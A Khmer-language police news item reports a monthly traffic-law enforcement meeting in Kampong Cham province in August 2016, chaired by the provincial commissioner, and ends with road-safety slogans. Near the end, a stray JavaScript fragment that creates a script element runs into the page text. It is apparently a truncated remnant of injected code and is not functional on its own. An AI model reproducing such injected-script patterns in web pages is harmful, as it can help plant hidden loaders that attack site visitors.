កិច្ចប្រជុំស្តីពីការអនុវត្តច្បាប់ចរាចរណ៍ប្រចាំខែកក្កដា ក្រោមអធិបតីភាព លោកឧត្តមសេនីយ៍ទោ បែន រ័ត្ន

ខេត្តកំពង់ចាម៖ នាព្រឹកថ្ងៃទី០២ ខែសីហា ឆ្នាំ២០១៦ នៅសាលប្រជុំជាន់លើនៃស្នងការដ្ឋាននគរបាលខេត្ត កំពង់ចាម មានកិច្ចប្រជុំស្តីពីការអនុវត្តច្បាប់ចរាចរណ៍ប្រចាំខែកក្កដា និងទិសដៅខែសីហា ក្រោម អធិបតីភាព លោកឧត្តមសេនីយ៍ទោ បែន រ័ត្ន ស្នងការនៃស្នងការដ្ឋាននគរបាលខេត្តកំពង់ចាម។
សមាសភាពចូលរួមមាន: លោកស្នងការរងទទួលផែនភស្តុភារ លោកស្នងការរងទទួលផែនសណ្តាប់ធ្នាប់ នាយរងការិយាល័យចរាចរណ៍ផ្លូវគោក នាយការិយាល័យគណនេយ្យលោកអធិការក្រុងកំពង់ ចាម កំពង់សៀម ចំការលើលោកអធិការរងសណ្តាប់ធ្នាប់ទាំង១០ស្រុក ក្រុង និងមន្រ្តីកាន់ការងារគណនេយ្យ គ្រប់គ្រងថវិកាចរាចរណ៍ទាំងអស់។

ជាកិច្ចចាប់ផ្តើម លោកឧត្តមសេនីយ៍ត្រី ជុំ ថានី ស្នងការរងទទួលផែនសណ្តាប់ធ្នាប់បានរាយការណ៍
អំពីបាយការណ៍ចរាចរណ៍ប្រចាំខែជូនអង្គពិធី បន្ទាប់មកលោកឧត្តមសេនីស្នងការបានមានប្រសាសន៍ វាយតម្លៃខ្ពស់ចំពោះលទ្ធផលប្រតិបត្តិការអនុវត្តច្បាប់ចរាចរណ៍លោកឧត្តមសេនីយ៍ស្នងការក៏បានសំណូមពរដល់មន្រ្តីចុះអនុវត្តច្បាប់ចរាចរណ៍តាមគោលដៅទាំងអស់អោយយកចិត្តទុកដាក់និងធ្វើការផ្សព្វផ្សាយច្បាប់ចរាចរណ៍ដល់បងប្អូនប្រជាពលរដ្ឋអោយមានការយល់ដឹងកាន់តែច្បាស់ថែមទៀត។

ជាចុងក្រោយលោកឧត្តមសេនីយ៍ស្នងការបានអនុញ្ញាតិអោយអង្គពិធីលើកឡើងពីបញ្ហាប្រឈមហើយលោកឧត្តមសេនីយ៍ស្នងការបានផ្តាំផ្ញើរដល់មន្រ្តីដែលអនុវត្តច្បាប់ចរាចរណ៍តាមគោលដៅទាំងអស់ត្រូវមានសុជីវធម៌ក្នុងការនិយាយស្តីទៅកាន់ប្រជាពលរដ្ឋនិងមានភាពទន់ភ្លន់តែម៉ឺងម៉ាត់ក្នុងការងារខិតខំបំពេញភារកិច្ចរបស់ខ្លួនអោយបានល្អ បម្រើប្រជាពលរដ្ឋអោយអស់ពីកម្លាំងកាយចិត្ត។
“បើស្រវឹងកុំបើកបរ” “គោរពច្បាប់ចរាចរណ៍ទាំងអស់គ្នាដើម្បីការពារជីវិតយើងនិងអ្នកដទៃ”
អត្ថបទ:ក្រុមផ្សព្វផ្សាយ
រូបភាព:ក្រុមផ្សាព្វផ្សាយ

image image image image image imagevar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More